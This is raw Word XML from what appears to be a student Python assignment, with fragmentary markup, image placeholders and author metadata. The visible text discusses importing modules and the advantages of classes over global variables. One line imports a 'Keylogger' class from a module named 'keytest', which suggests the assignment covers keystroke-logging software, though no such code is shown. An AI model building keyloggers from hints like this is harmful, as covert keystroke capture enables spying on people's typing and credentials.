          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF7D0F" w14:textId="38CD5EC6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B99FDB" w14:textId="21366ACE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C16EF" w14:textId="543EB351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F0A8F2" wp14:editId="33C97FF5">
            <wp:extent cx="5943600" cy="535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C533" w14:textId="77777777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72180D" w14:textId="29B238BA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B8D743" wp14:editId="3B68D0C4">
            <wp:extent cx="5943600" cy="1968964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96"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1968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71382" w14:textId="49721217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CE87A" w14:textId="2DDF6E48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969173" w14:textId="736A9458" w:rsidR="00290C5C" w:rsidRDefault="00290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C9ED80" w14:textId="77777777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AA918D" w14:textId="62E330CD" w:rsidR="00C11183" w:rsidRPr="00290C5C" w:rsidRDefault="00290C5C" w:rsidP="00290C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0C5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00290C5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mported by other python programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075FB3C1" w14:textId="05AF315E" w:rsidR="00C11183" w:rsidRDefault="00290C5C" w:rsidP="00290C5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90C5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90C5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keytest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00290C5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import Keylogger as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290C5C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2D058D69" w14:textId="77777777" w:rsidR="00290C5C" w:rsidRPr="00290C5C" w:rsidRDefault="00290C5C" w:rsidP="00290C5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FF65241" w14:textId="39E86ADF" w:rsidR="00C11183" w:rsidRDefault="00C11183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0AEBF0" wp14:editId="5DC3C1A3">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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D2FE" w14:textId="1B3C2EC9" w:rsidR="00290C5C" w:rsidRDefault="00290C5C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DB8652" w14:textId="246E7CF9" w:rsidR="00290C5C" w:rsidRDefault="00290C5C" w:rsidP="00C1118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F7CD6" wp14:editId="291C2B62">
            <wp:extent cx="5943600" cy="615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2390" w14:textId="1C0A339D" w:rsidR="00D51913" w:rsidRDefault="00D5191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6AE1E1" w14:textId="75685864" w:rsidR="00D51913" w:rsidRDefault="00D51913" w:rsidP="00C111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13E47F" w14:textId="5EE5EB04" w:rsidR="00D51913" w:rsidRPr="00D51913" w:rsidRDefault="00D51913" w:rsidP="00D5191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51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">There are several advantages to using classes instead of global variables. </w:t>
      </w:r>
      <w:r w:rsidR="0006010B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0006010B" w:rsidRPr="00D51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>improves</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> code organization, making it easier to maintain and modify.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010B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="00D519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1913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>encourage</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encapsulation and abstraction, which aid in the concealment of implementation details and the improvement of code readability.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D51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sing classes encourages code reusability by allowing objects of the same class to be used in multiple parts of the program. Finally, </w:t>
      </w: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Pr="00D51913">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enables the implementation of inheritance and polymorphism, resulting in more robust and flexible code.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D51913" w:rsidRPr="00D51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7812"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42BCB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C77789"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8E84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629E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A0CD674"/>
    <w:lvl w:ilvl="0" w:tplc="4DC4ED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3B5BC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E53CC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455671"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD267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066755">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1194146626">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1976177370">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1488207267">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="893085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I0NjcyMzcxsDA2MzZT0lEKTi0uzszPAykwrgUAWLm5diwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00FB5AA8"/>
    <w:rsid w:val="0006010B"/>
    <w:rsid w:val="000C0B66"/>
    <w:rsid w:val="00197126"/>
    <w:rsid w:val="001E4365"/>
    <w:rsid w:val="0023648B"/>
    <w:rsid w:val="0027223A"/>
    <w:rsid w:val="00286BD1"/>
    <w:rsid w:val="00290C5C"/>
    <w:rsid w:val="002B12DA"/>
    <w:rsid w:val="002F0659"/>
    <w:rsid w:val="004032F9"/>
    <w:rsid w:val="00495C64"/>
    <w:rsid w:val="004D0416"/>
    <w:rsid w:val="005219E8"/>
    <w:rsid w:val="006F475C"/>
    <w:rsid w:val="00713810"/>
    <w:rsid w:val="007D31DB"/>
    <w:rsid w:val="00891577"/>
    <w:rsid w:val="008A51F8"/>
    <w:rsid w:val="00957FA4"/>
    <w:rsid w:val="00AE437D"/>
    <w:rsid w:val="00C11183"/>
    <w:rsid w:val="00D22CF0"/>
    <w:rsid w:val="00D51913"/>
    <w:rsid w:val="00D529F8"/>
    <w:rsid w:val="00D910F0"/>
    <w:rsid w:val="00D92A79"/>
    <w:rsid w:val="00DD4955"/>
    <w:rsid w:val="00DF7981"/>
    <w:rsid w:val="00E07418"/>
    <w:rsid w:val="00FB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6577"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B66FE1DA-E930-42CB-BACD-EDDA8438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1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1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7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Pengcheng Wang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Likith Kanneganti</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-14T22:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-26T22:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>